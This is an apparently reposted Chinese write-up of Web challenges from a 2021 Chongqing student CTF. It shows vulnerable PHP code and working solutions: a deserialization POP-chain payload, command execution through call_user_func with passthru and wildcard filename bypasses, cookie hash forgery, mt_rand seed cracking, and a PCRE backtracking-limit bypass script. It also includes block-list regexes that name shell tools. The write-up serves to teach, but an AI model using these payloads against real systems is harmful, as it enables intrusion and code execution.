2021年“绿盟杯”重庆市大学生信息安全竞赛线上赛-Writeup

Posted 末 初

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021年“绿盟杯”重庆市大学生信息安全竞赛线上赛-Writeup相关的知识,希望对你有一定的参考价值。


Web

flag在哪里

 <?php
error_reporting(0);
class begin{
    public $file;
    public $mode;
    public $content;
    public $choice;
    public function __construct()
    {
        $this->file = "file";
        $this->content = "content";
    }
    function __wakeup()
    {
        if($this->mode=="write"){
            $this->choice= new write();
        }
        if($this->mode=="read"){
            $this->choice= new read();
        }
    }
    function __call($file,$content) {
        highlight_file($this->file);
    }
    function __destruct(){
        if($this->mode=="write"){
            $this->choice->writewritetxt($this->file,$this->content);
        }
        else{
            $this->choice->open($this->file);
        }
    }
}
class write{
    public function writewritetxt($file,$content)
    {
        $filename=$file.".txt";
        if(is_file($filename)){
            unlink($filename);
        }
        file_put_contents($filename, $content);
        echo "成功写入";
    }
}
class read{
    public $file;
    public function __construct(){
        $this->file="test.txt";
        echo "欢迎查看  ".$this->file."<br/>";
    }
    function open($filename){
        $file=$this->file;
        if(is_file($file)){
            if($file=="getflag.php"){
                die("getflag.php没东西");
                }
            else{
                highlight_file($file);
                }
        }else{
            echo "文件不存在";
        }
    }
}
function check($dis_content){
    if(preg_match('/system|eval|wget|exec|zip|passthru|netcat|phpinfo|`|shell|\\(|\\)/i', $dis_content)){
        die("hack !!!");
    }
}
$pop=$_GET['pop'];
if (isset($pop)) {
    check($pop);
    unserialize($pop);
} else {
    highlight_file("index.php");
}
?>   
highlight_file()<-begin::__call()<-begin::open()
<?php 
error_reporting(0);
class begin{
    public $file;
    public $mode;
    public $content;
    public $choice;
    public function __construct()
    {
        $this->file = "getflag.php";
        $this->content = "mochu7";
        $this->mode = "";
    }

}
$res = new begin();
$res->choice = new begin();
echo urlencode(serialize($res));
?>
PS C:\\Users\\Administrator\\Desktop> php -f .\\poc.php
O%3A5%3A%22begin%22%3A4%3A%7Bs%3A4%3A%22file%22%3Bs%3A11%3A%22getflag.php%22%3Bs%3A4%3A%22mode%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22content%22%3Bs%3A6%3A%22mochu7%22%3Bs%3A6%3A%22choice%22%3BO%3A5%3A%22begin%22%3A4%3A%7Bs%3A4%3A%22file%22%3Bs%3A11%3A%22getflag.php%22%3Bs%3A4%3A%22mode%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22content%22%3Bs%3A6%3A%22mochu7%22%3Bs%3A6%3A%22choice%22%3BN%3B%7D%7D

getflag.php

<?php
error_reporting(0);
$a=$_POST['a'];    
$b=$_POST['b'];
if(preg_match('/cat|more|less|head|tac|tail|nl|od|vi|sort|cut|ping|curl|nc|grep|system|exec|bash|unique|find|popen|open|ls|rm|sleep|chr|ord|bin|hex|dict|#|`|\\$|\\<|\\(|\\[|\\]|\\{|\\}|\\)|\\>|\\_|\\'|"|\\*|;|\\||&|\\/|\\\\\\\\/is', $a)){
    die("hack!!!!");
}
if(!preg_match('/[a-z]/is', $b))
{
    die("big hack!!!!");
}
call_user_func($b,$a); 
b=passthru&a=dir
b=passthru&a=rev ?f?l?a?g.php

>>> flag='php?< ;)(tixe ;"}as211-csq-53vd-1vdv-5ads{galf" ohce >?'
>>> flag[::-1]
'?> echo "flag{sda5-vdv1-dv35-qsc-112sa}"; exit(); <?php'

寻宝奇兵


第一关

<?php             
$SECRET="There is no treasure here";
if (isset($_COOKIE["users"])) {
if($_COOKIE["users"]==="explorer")
{
    die("Explorers are not welcome");
}
$hash = $_COOKIE["hash"];
$users = $_COOKIE["users"];

if($hash === md5($SECRET.$users)){
    echo "<script>alert('恭喜')</script>";
                 }
    } else {
        setcookie("users", "explorer");
        setcookie("hash", md5($SECRET . "explorer"));
}
?>
PS C:\\Users\\Administrator\\Desktop> php -r "var_dump(md5('There is no treasure here'.'mochu7'));"
Command line code:1:
string(32) "d8951489320b4ea46f62d9747c1f587a"
hash=d8951489320b4ea46f62d9747c1f587a
user=mochu7

第二关

<?php
session_start();
if(!isset($_SESSION['seed'])){
	$_SESSION['seed']=rand(0,999999999);
}

mt_srand($_SESSION['seed']);

$table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$pass='';

for ( $i = 0; $i < 24; $i++ ){
    $pass.=substr($table, mt_rand(0, strlen($table) - 1), 1);   
}

if(isset($_POST['password'])){
    if($pass==$_POST['password']){
			echo "<script >alert('恭喜你')</script>";
}

破解伪随机数,给出了生成伪随机数的前十二位:kv34bCTSCMnW
可以通过这些字符串的位置来反推得到mt_rand(0, strlen($table) - 1)生成的随机数
将伪随机数转换成php_mt_seed可以识别的数据格式

userpass = "kv34bCTSCMnW"
table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
out_str = ""

for idx1 in range(len(userpass)):
	for idx2 in range(len(table)):
		if userpass[idx1] == table[idx2]:
			out_str += str(idx2)+' '+str(idx2)+' '+'0'+' '+str(len(table)-1)+' '
print(out_str)
PS C:\\Users\\Administrator\\Desktop> python .\\code.py
10 10 0 61 21 21 0 61 29 29 0 61 30 30 0 61 1 1 0 61 38 38 0 61 55 55 0 61 54 54 0 61 38 38 0 61 48 48 0 61 13 13 0 61 58 58 0 61

使用php_mt_seed爆破seed

root@mochu7-pc:/mnt/d/Tools/Web/php_mt_seed# ./php_mt_seed 10 10 0 61 21 21 0 61 29 29 0 61 30 30 0 61 1 1 0 61 38 38 0 61 55 55 0 61 54 54 0 61 38 38 0 61 48 48 0 61 13 13 0 61 58 58 0 61
Pattern: EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62 EXACT-FROM-62
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 1776.4 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x14000000 - 0x15ffffff, speed 145.3 Mseeds/s
seed = 0x1464b1df = 342143455 (PHP 7.1.0+)
Found 1, trying 0xfe000000 - 0xffffffff, speed 131.4 Mseeds/s
Found 1

然后再生成密码

<?php 
mt_srand(342143455);
$table = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$pass='';

for ( $i = 0; $i < 24; $i++ ){
    $pass.=substr($table, mt_rand(0, strlen($table) - 1), 1);   
}
echo $pass;
 ?>
PS C:\\Users\\Administrator\\Desktop> php -f .\\generate.php
kv34bCTSCMnWckt0yshMVbBE

第三关

<?php
function is_php($data){
    return preg_match('/[flag].*[php]/is', $data);
}
if($_POST['treasure'])
{
    if(is_php($_POST['treasure'])) {
        echo "<script >alert('这个不能拿走');</script>";
    } else {
        if(preg_match('/flag.php/is', $_POST['treasure'])){
           highlight_file('flag.php');
      }
    }
} 
?>

这里把正则的返回值作为判断条件,直接可以利用利用PCRE回溯次数限制

import requests

burp0_url = "http://119.61.19.212:57305/treasure.php"
burp0_cookies = {"users": "mochu7", "hash": "d8951489320b4ea46f62d9747c1f587a", "PHPSESSID": "4dg0t8t3g9dtfocod561hjr2c8"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://119.61.19.212:57305", "Connection": "close", "Referer": "http://119.61.19.212:57305/treasure.php", "Upgrade-Insecure-Requests": "1"}
payload = "flag.php" + 'a'*1000000
burp0_data = {"treasure": payload}
res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print(res.text)

mid



serialize

<?php
error_reporting(0);
highlight_file(__FILE__);

class Demo{
    public $class;
    public $user;
    public function __construct()
    {
        $this->class = "safe";
        $this->user = "ctfer";
        $context = new $this->class ($this->user);
        foreach($context as $f){
            echo $f;
        }
    }

    public function __wakeup()
    {
        $context = new $this->class ($this->user);
        foreach($context as $f){
            echo $f;
        }
    }

}
class safe{
    var $user;
    public function __construct($user)
    {
        $this->user = $user;
        echo ("hello ".$this->user);
    }
}


if(isset($_GET['data'])){
    unserialize($_GET[以上是关于2021年“绿盟杯”重庆市大学生信息安全竞赛线上赛-Writeup的主要内容,如果未能解决你的问题,请参考以下文章

第十四届全国大学生信息安全竞赛-线上赛Writeup

“东华杯”2021年大学生网络安全邀请赛 暨第七届上海市大学生网络安全大赛线上赛MISC-Writeup

“东华杯”2021年大学生网络安全邀请赛 暨第七届上海市大学生网络安全大赛线上赛MISC-Writeup

第十六届全国大学生智能汽车竞赛总决赛 AI视觉组线上赛细则

第十六届全国大学生智能汽车竞赛总决赛 AI视觉组线上赛图片显示软件发布及线上赛注意事项

2018 ACM-ICPC 中国大学生程序设计竞赛线上赛 B. Goldbach-米勒拉宾素数判定(大素数)